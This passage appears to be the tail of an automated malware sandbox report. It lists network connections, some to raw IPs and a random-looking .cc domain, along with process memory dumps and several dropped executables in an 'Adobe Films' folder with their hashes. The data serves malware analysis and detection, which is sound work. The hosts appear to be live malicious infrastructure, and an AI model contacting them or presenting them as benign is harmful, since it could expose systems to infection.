RU 193.233.193.49:11906 tcp
US 8.8.8.8:53 cnSrufvjrfjAHpXtGtICmuqBsaZF.cnSrufvjrfjAHpXtGtICmuqBsaZF udp
SC 185.215.113.15:80 185.215.113.15 tcp
FI 65.108.213.210:80 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:80 tcp
RU 176.124.204.171:8000 176.124.204.171 tcp
US 8.8.8.8:53 fp-afd.azureedge.net udp
US 13.107.246.67:443 fp-afd.azureedge.net tcp
US 13.107.246.67:443 fp-afd.azureedge.net tcp
SC 185.215.113.15:80 185.215.113.15 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:80 tcp
SC 185.215.113.15:80 185.215.113.15 tcp
US 8.8.8.8:53 stun1.l.google.com udp
US 172.253.121.127:19302 stun1.l.google.com udp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:31464 tcp
N/A 10.127.0.24:80 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:50358 tcp
N/A 10.127.0.24:80 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:31464 tcp
SC 185.215.113.15:80 185.215.113.15 tcp
N/A 127.0.0.1:31464 tcp
FI 65.108.213.210:80 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc tcp
N/A 224.0.0.251:5353 udp
SC 185.215.113.15:80 185.215.113.15 tcp
SC 185.215.113.15:80 185.215.113.15 tcp
FI 65.108.213.210:80 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc tcp
SC 185.215.113.15:80 185.215.113.15 tcp

Files

memory/3620-130-0x0000000000F50000-0x000000000104A000-memory.dmp

memory/3620-132-0x000000000A3E0000-0x000000000A984000-memory.dmp

memory/4196-133-0x0000000000000000-mapping.dmp

memory/4196-134-0x0000000000400000-0x0000000000438000-memory.dmp

memory/4196-135-0x0000000000400000-0x0000000000438000-memory.dmp

memory/4196-136-0x0000000000400000-0x0000000000438000-memory.dmp

memory/4196-137-0x0000000000400000-0x0000000000438000-memory.dmp

memory/4196-138-0x0000000003BF0000-0x0000000003E73000-memory.dmp

memory/4196-139-0x0000000000400000-0x0000000000438000-memory.dmp

memory/4196-140-0x0000000003BF0000-0x0000000003E73000-memory.dmp

memory/4436-141-0x0000000000000000-mapping.dmp

memory/3704-143-0x0000000000000000-mapping.dmp

memory/4052-142-0x0000000000000000-mapping.dmp

memory/1744-150-0x0000000000000000-mapping.dmp

memory/2948-149-0x0000000000000000-mapping.dmp

C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe

MD5 f8d8b67dfcec2684e96122cb9aea4daf
SHA1 39ea9ffed4bba9db6635b4aa1a38f79d6a9062b7
SHA256 083e66dc1b7fe9c08ccf244b0620896bfef6f23ad9f9468456d7587aaebc95b5
SHA512 55405c02c17508250be84461dd527163a53224c34147b51d1dc84d6dd028a6aae5bd8ac9e6be81882fbf2adf9851b2f425e71f9b32ea2df1f2fabfac21fe10c6

C:\Users\Admin\Pictures\Adobe Films\sd1gX57A0wItT05S8cNnJS6P.exe

MD5 f8d8b67dfcec2684e96122cb9aea4daf
SHA1 39ea9ffed4bba9db6635b4aa1a38f79d6a9062b7
SHA256 083e66dc1b7fe9c08ccf244b0620896bfef6f23ad9f9468456d7587aaebc95b5
SHA512 55405c02c17508250be84461dd527163a53224c34147b51d1dc84d6dd028a6aae5bd8ac9e6be81882fbf2adf9851b2f425e71f9b32ea2df1f2fabfac21fe10c6

C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe

MD5 45abb1bedf83daf1f2ebbac86e2fa151
SHA1 7d9ccba675478ab65707a28fd277a189450fc477
SHA256 611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
SHA512 6bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c

C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe

MD5 8e6f9cd063f15c66246c1def889860fd
SHA1 40d75fd878f3103a2949980f48525b8d221c0ed6
SHA256 98f2f76e626b55fb471e5e9a830bc64ea4bbae565c3a554fea6970d8ffbede76
SHA512 c0f44c98480b0540f075b7de4025b1a14fa6020f95372767fa59217656ab64a1f14ecff628c6056434fa19ac39c55e6215b77d79d4d5e68a8a09fd63805e83df

C:\Users\Admin\Pictures\Adobe Films\1hObAWF58hoo9_jA8jPWtwDx.exe

MD5 45abb1bedf83daf1f2ebbac86e2fa151
SHA1 7d9ccba675478ab65707a28fd277a189450fc477
SHA256 611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
SHA512 6bf1f7e0800a90666206206c026eadfc7f3d71764d088e2da9ca60bf5a63de92bd90515342e936d02060e1d5f7c92ddec8b0bcc85adfd8a8f4df29bd6f12c25c

memory/1624-165-0x0000000000000000-mapping.dmp

C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe

MD5 022300f2f31eb6576f5d92cdc49d8206
SHA1 abd01d801f6463b421f038095d2f062806d509da
SHA256 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA512 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe

C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe

MD5 022300f2f31eb6576f5d92cdc49d8206
SHA1 abd01d801f6463b421f038095d2f062806d509da
SHA256 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA512 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe

C:\Users\Admin\Pictures\Adobe Films\EYGVHMYze8w9bXCxKAs0sRH8.exe

MD5 8e6f9cd063f15c66246c1def889860fd
SHA1 40d75fd878f3103a2949980f48525b8d221c0ed6
SHA256 98f2f76e626b55fb471e5e9a830bc64ea4bbae565c3a554fea6970d8ffbede76